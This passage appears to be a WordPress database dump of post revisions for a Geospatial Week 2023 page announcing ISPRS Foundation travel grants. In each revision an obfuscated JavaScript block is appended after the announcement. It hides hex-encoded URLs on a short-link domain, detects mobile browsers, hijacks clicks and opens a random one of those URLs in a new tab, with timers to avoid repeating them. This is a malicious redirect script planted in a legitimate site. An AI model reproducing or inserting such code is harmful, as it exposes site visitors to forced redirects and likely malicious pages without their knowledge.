wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','TRAVEL GRANTS','','inherit','closed','closed','','2665-revision-v1','','','2023-03-30 06:00:17','2023-03-30 06:00:17','',2665,'https://gsw2023.com/?p=3972',0,'revision','',0),
(3973,1,'2023-03-30 06:02:22','2023-03-30 06:02:22','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\" title_font_style=\"font-weight:bold;\"]</p>\n<h5><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023</strong></h5>\n<p>The ISPRS Foundation (TIF) will be offering travel grants to deserving applicants, especially from developing countries, to participate in the <a href=\"https://gsw2023.com/\">Geospatial Week (Egypt GSW’2023)</a>, September 2023, Cairo, Egypt. Please note that The <a href=\"http://www.isprs.org/foundation/Default.aspx\">ISPRS Foundation</a> has limited amount of funds and therefore only limited number of grants will be offered. The following are the important dates for the applicants.</p>\n<p>&nbsp;</p>\n<h4 style=\"font-weight: 400;\"><strong>Important Dates for applicants for travel grants sponsored by The ISPRS Foundation.</strong></h4>\n<ul>\n<li>Applications for travel grants “live” on TIF web site : March 31, 2023</li>\n<li>Deadline for submission of travel grant applications : May 18, 2023</li>\n<li>Decision and notification of successful applicants : June 3, 2023</li>\n<li>Notification of acceptance of travel grant to Operations Officer : July 3, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><strong>Applications can be done through below link,</strong><br />\n<a href=\"https://www.isprs.org/foundation/forms/Travel_Grants.aspx\">https://www.isprs.org/foundation/forms/Travel_Grants.aspx</a></p>\n<h4 class=\"gap-50\"></h4>\n<h4 id=\"respond\"></h4>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','TRAVEL GRANTS','','inherit','closed','closed','','2665-revision-v1','','','2023-03-30 06:02:22','2023-03-30 06:02:22','',2665,'https://gsw2023.com/?p=3973',0,'revision','',0),
(3974,1,'2023-03-30 06:03:00','2023-03-30 06:03:00','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\" title_font_style=\"font-weight:bold;\"]</p>\n<h5><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023</strong></h5>\n<p>The ISPRS Foundation (TIF) will be offering travel grants to deserving applicants, especially from developing countries, to participate in the <a href=\"https://gsw2023.com/\">Geospatial Week (Egypt GSW’2023)</a>, September 2023, Cairo, Egypt. Please note that The <a href=\"http://www.isprs.org/foundation/Default.aspx\">ISPRS Foundation</a> has limited amount of funds and therefore only limited number of grants will be offered. The following are the important dates for the applicants.</p>\n<p>&nbsp;</p>\n<h4 style=\"font-weight: 400;\"><strong>Important Dates for applicants for travel grants sponsored by The ISPRS Foundation.</strong></h4>\n<ul>\n<li>Applications for travel grants “live” on TIF web site : March 31, 2023</li>\n<li>Deadline for submission of travel grant applications : May 18, 2023</li>\n<li>Decision and notification of successful applicants : June 3, 2023</li>\n<li>Notification of acceptance of travel grant to Operations Officer : July 3, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p><strong>Applications can be done through below link,</strong><br />\n<a href=\"https://www.isprs.org/foundation/forms/Travel_Grants.aspx\">https://www.isprs.org/foundation/forms/Travel_Grants.aspx</a></p>\n<h4 class=\"gap-50\"></h4>\n<h4 id=\"respond\"></h4>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 